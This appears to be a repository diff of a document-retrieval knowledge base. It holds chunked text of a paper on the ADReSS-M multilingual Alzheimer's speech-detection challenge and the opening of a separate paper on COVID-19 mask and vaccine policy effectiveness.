+ page_content=' To the best of our knowledge no work has investigated acoustic features of the speech signal in multilingual AD detection.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
22
+ page_content=' Our baseline system used conven- tional machine learning algorithms with Active Data Repre- sentation of acoustic features, achieving accuracy of 73.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
23
+ page_content='91% on AD detection, and 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
24
+ page_content='95 root mean squared error on cogni- tive score prediction.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
25
+ page_content=' Index Terms— Alzheimer’s dementia detection, speech processing, speech biomarkers.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
26
+ page_content=' 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
27
+ page_content=' INTRODUCTION Dementia is a category of neurodegenerative diseases that en- tail a long-term and usually gradual decrease of cognitive functioning.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
28
+ page_content=' As cost-effective and accurate biomarkers of neurodegeneration have been sought in the field of demen- tia research, speech-based “digital biomarkers” have emerged as a promising possibility.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
29
+ page_content=' While there has been much inter- est in automated methods for cognitive impairment detection through speech by the signal processing and machine learn- ing communities [1], most of the proposed approaches have not investigated which speech features can be generalised and transferred across languages for AD prediction, and to the best of our knowledge no work has investigated acoustic fea- tures of speech in multilingual AD detection.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
30
+ page_content=' This SPGC, “ADReSS-M: Multilingual Alzheimer’s Dementia Recogni- tion through Spontaneous Speech” targets this issue by defin- ing prediction tasks whereby participants train their models on English speech data and assess their models’ performance on spoken Greek data.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
31
+ page_content=' The models submitted to the challenge focus on acoustic or linguistic features of the speech signal whose predictive power is preserved across languages.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
32
+ page_content=' This SPGC aims to provide a platform for contributions and discussions on applying signal processing and machine learning methods for multilingual AD recognition, and stim- ulate the discussion of machine learning architectures, novel signal processing features, feature selection and extraction methods, and other topics of interest to the growing commu- nity of researchers interested in investigating the connections between speech and dementia.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
33
+ page_content=' 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
34
+ page_content=' THE PREDICTION TASKS The ADReSS-M challenge consists of the following tasks: (1) a classification task, where the model will aim to dis- tinguish healthy control speech from AD/MCI speech, and (2) an MMSE score prediction (regression) task, where you create a model to infer the speaker’s Mini Mental Status Ex- amination (MMSE) score based on speech data.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
35
+ page_content=' Participants could choose to do one or both tasks.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
36
+ page_content=' They were provided with a training set and, two weeks prior to the paper submis- sion deadline, with test sets on which to test their models.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
37
+ page_content=' Up to five sets of results were allowed for scoring for each task per participant.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
38
+ page_content=' All attempts had to be submitted together.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
39
+ page_content=' 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
40
+ page_content='1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
41
+ page_content=' The data sets This SPGC data sets were made available through Dementia- Bank1, upon request.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
42
+ page_content=' The training dataset consists of spon- taneous speech samples corresponding to audio recordings of picture descriptions produced by cognitively normal subjects and patients with an AD diagnosis, who were asked to de- scribe the Cookie Theft picture from the Boston Diagnostic Aphasia Examination test[2].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
43
+ page_content=' The participants were speak- ers of English.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
44
+ page_content=' The test set consists of spontaneous speech descriptions of a different picture, in Greek.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
45
+ page_content=' The recordings were made in one of these languages.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
46
+ page_content=' Participants were ini- tially allowed access only to the training data (in English) and some sample Greek data (8 recordings) for development pur- poses.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
47
+ page_content=' 1https://dementia.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
48
+ page_content='talkbank.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
49
+ page_content='org/ The Greek recordings assess participants’ verbal fluency and mood using a picture that the participant describes while looking at it.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
50
+ page_content=' The assessor first shows the participant a picture representing a lion lying with a cub in the dessert while eat- ing.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
51
+ page_content=' The assessor then asks the participants to give a verbal description of the picture in a few sentences.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
52
+ page_content=' The training dataset was balanced with respect to age and gender in order to eliminate potential confounding and bias.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
53
+ page_content=' As we employed a propensity score approach to matching we did not need to adjust for education, as it correlates with age and gender, which suffice as an admissible for adjustment (see [3, pp 348-352]).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
54
+ page_content=' The dataset was checked for matching ac- cording to scores defined in terms of the probability of an instance being treated as AD given covariates age and gender estimated through logistic regression, and matching instances were selected.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
55
+ page_content=' All standardized mean differences for the co- variates were below 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
56
+ page_content='1 and all standardized mean differences for squares and two-way interactions between covariates were below 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
57
+ page_content='15, indicating adequate balance for those covariates.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
58
+ page_content=' 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
59
+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
60
+ page_content=' Evaluation The classification task is evaluated in terms of accuracy, specificity, sensitivity and F1 scores.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
61
+ page_content=' For the regression task (MMSE prediction), the metrics used are the coefficient of determination and root mean squared error.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
62
+ page_content=' The ranking of submissions is based on accuracy scores for the classifica- tion task (task 1), and on RMSE scores for the MMSE score regression task (task 2).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
63
+ page_content=' 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
64
+ page_content=' BASELINE MODELS First we normalised the volume of audio files using ffmpeg’ EBU R128 scanner filter.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
65
+ page_content=' A sliding window of 1 s, with no overlap, was then applied to the audio, and eGeMAPS fea- tures were extracted over these frames.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
66
+ page_content=' The eGeMAPS fea- ture set [4] is a basic set of acoustic features designed to de- tect physiological changes in voice production.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
67
+ page_content=' It contains the F0 semitone, loudness, spectral flux, MFCC, jitter, shim- mer, F1, F2, F3, alpha ratio, Hammarberg index and slope V0 features, as well as their most common statistical functionals, totalling 88 features per frame.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
68
+ page_content=' Given the eGeMAPS features, we applied the active data representation method (ADR) [5] to generate a frame level acoustic representation for each au- dio recording.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
69
+ page_content=' The ADR method has been used previously to generate large scale time-series data representation.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
70
+ page_content=' It em- ploys self-organising mapping to cluster the original acoustic features and then computes second-order features over these clusters to extract new features [5].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
71
+ page_content=' This method is entirely automatic in that no speech segmentation or diarisation infor- mation is provided to the algorithm.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
72
+ page_content=' For task 1, we employed a Na¨ıve Bayes classifier with kernel smoothing estimation.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
73
+ page_content=' The ADR for feature extraction was optimised using a grid search (C = 5, 10, 15, 20, 25).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
74
+ page_content=' We achieved accuracies of 75.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
75
+ page_content='00% and 73.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
76
+ page_content='91% on sample and test data respectively using 15+2 ADR, age and gender features per recording.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
77
+ page_content=' On the test set, specificity was 79.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
78
+ page_content='2%, precision was 75%, sensitivity was 68.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
79
+ page_content='2%, and F1 was 71.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
80
+ page_content='4%.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
81
+ page_content=' The feature to training audio ratio was 19:237.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
82
+ page_content=' For the MMSE regression task (task 2), we employed a support vector machine (SVM) model with a RBF kernel with box constraint of 1, and sequential minimal optimization solver.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
83
+ page_content=' The ADR for feature extraction was optimised using a grid search (C = 5, 10, 15, 20, 25).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
84
+ page_content=' This model achieved a root mean squared error (RMSE) of 3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
85
+ page_content='887 (r = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
86
+ page_content='273) and 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
87
+ page_content='955 (r = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
88
+ page_content='348) on sample and test data respectively using 25+2 ADR, age and gender features per recording.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
89
+ page_content=' The feature to training audio recordings ratio was also 29:237.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
90
+ page_content=' 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
91
+ page_content=' CONCLUSION Spontaneous speech analysis has the potential to enable novel applications for speech technology in longitudinal, unob- trusive monitoring of cognitive health.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
92
+ page_content=' By focusing on AD recognition using spontaneous speech, this SPGC investigates an alternative to neuropsychological and clinical evaluation approaches to AD detection and cognitive assessment.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
93
+ page_content=' Fur- thermore, the multilingual setting provided by this SPGC allows the investigation of features that might generalise across languages, extending the applicability of the models.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
94
+ page_content=' In keeping with the objectives of AD prediction evaluation, the ADReSS-M challenge provides a statistically matched data set so as to mitigate common biases often overlooked in evaluations of AD detection methods, including repeated occurrences of speech from the same participant, variations in audio quality, and imbalances of gender, age and educational level.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
95
+ page_content=' We hope this might serve as a benchmark for future research on multilingual AD assessment.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
96
+ page_content=' 5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
97
+ page_content=' REFERENCES [1] S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
98
+ page_content=' de la Fuente Garcia, C.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
99
+ page_content=' Ritchie, and S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
100
+ page_content=' Luz, “Artificial intelligence, speech and language processing approaches to monitoring Alzheimer’s disease: a systematic review,” Journal of Alzheimer’s Disease, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
101
+ page_content=' 78, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
102
+ page_content=' 4, 2020.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
103
+ page_content=' [2] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
104
+ page_content=' Becker, F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
105
+ page_content=' Boller, O.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
106
+ page_content=' Lopez, J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
107
+ page_content=' Saxton, and K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
108
+ page_content=' Mc- Gonigle, “The natural history of Alzheimer’s disease: Description of study cohort and accuracy of diagnosis,” Archives of Neurology, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
109
+ page_content=' 51, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
110
+ page_content=' 6, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
111
+ page_content=' 585–594, 1994.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
112
+ page_content=' [3] J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
113
+ page_content=' Pearl, Causality: Models, Reasoning, and Inference, Cambridge University Press, 2nd edition, 2009.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
114
+ page_content=' [4] F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
115
+ page_content=' Eyben et al.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
116
+ page_content=', “The Geneva minimalistic acoustic pa- rameter set for voice research and affective computing,” IEEE Trans Affect Computing, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
117
+ page_content=' 7, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
118
+ page_content=' 2, 2016.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
119
+ page_content=' [5] F.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
120
+ page_content=' Haider, S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
121
+ page_content=' de la Fuente, and S.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
122
+ page_content=' Luz, “An assess- ment of paralinguistic acoustic features for detection of alzheimer’s dementia in spontaneous speech,” IEEE J Sel Top Signal Process, vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
123
+ page_content=' 14, no.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
124
+ page_content=' 2, pp.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
125
+ page_content=' 272–281, 2020.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/IdE5T4oBgHgl3EQfWw_6/content/2301.05562v1.pdf'}
KdE4T4oBgHgl3EQf7w5t/content/tmp_files/2301.05342v1.pdf.txt ADDED
@@ -0,0 +1,939 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+
2
+
3
+ New Approach to Policy Effectiveness for Covid-19
4
+ and Factors Influence Policy Effectiveness
5
+
6
+ Yile He1, *
7
+ 1University of California, Davis, 95616, Davis, The United States
8
+ *Corresponding author. Email: abhe@ucdavis.edu
9
+ ABSTRACT
10
+ This study compared the effectiveness of COVID-19 control policies, including wearing masks, and the vaccine rates
11
+ through proportional infection rate in 28 states of the United States using the eSIR model. The effective rate of
12
+ policies was measured by the difference between the predicted daily infection proportion rate using the data before the
13
+ policy and the actual daily infection proportion rate. The study suggests that both mask and vaccine policy had a
14
+ significant impact on mitigating the pandemic. We further explored how different social factors influenced the
15
+ effectiveness of a specific policy through the linear regression model. Out of 9 factors, the population density, number
16
+ of hospital beds per 1000 people, and percent of the population over 65 are the most substantial factors on mask policy
17
+ effectiveness, while public health funding per person, percent of immigration have the most significant influence on
18
+ vaccine policy effectiveness. This study summarized the effectiveness of different policies and factors they associated
19
+ with. It can be served as a reference for future covid-19 related policy.
20
+ Keywords: Covid-19, eSIR, Linear Regression.
21
+ 1. INTRODUCTION
22
+ COVID-19 is an infectious disease caused by SARS-
23
+ CoV-2, which has been declared a global public health
24
+ emergency. As of 28 October 2021, it has led to more
25
+ than 45.7 million confirmed cases and resulted in more
26
+ than 742 thousand deaths in the United States [1].
27
+ Governments world- wide have implemented similar
28
+ policies to limit the spread of the virus, such as lock-
29
+ down, social distance, mask policies. Research has
30
+ proved the efficiency of the action behind each policy.
31
+ For example, the use of masks was strongly protective,
32
+ with a risk reduction of 70% for those that always wore
33
+ a mask when going out. [2] Additionally, those infection
34
+ rates are reduced drastically when social distancing
35
+ intervention is implemented between 80% to 100%. [3]
36
+ However, the actual effect of each policy was highly
37
+ varied among countries due to factors such as
38
+ socioeconomics [4,5]. Since issuing the policies with
39
+ high efficiency to mitigate the pandemic are extremely
40
+ important for all countries, we need to understand what
41
+ factors affect the policy efficiency and how they affect
42
+ it.
43
+ To solve these problems, previous studies have
44
+ measured the effectiveness of several NPI
45
+ (nonpharmaceutical interventions) [6,7,8], such as stay-
46
+ at-home and business close policy, by measuring the
47
+ change in real-time reproduction number (Rt), the
48
+ expected number of new infections caused by an
49
+ infectious individual in a population where some
50
+ individuals may no longer be susceptible [9], and
51
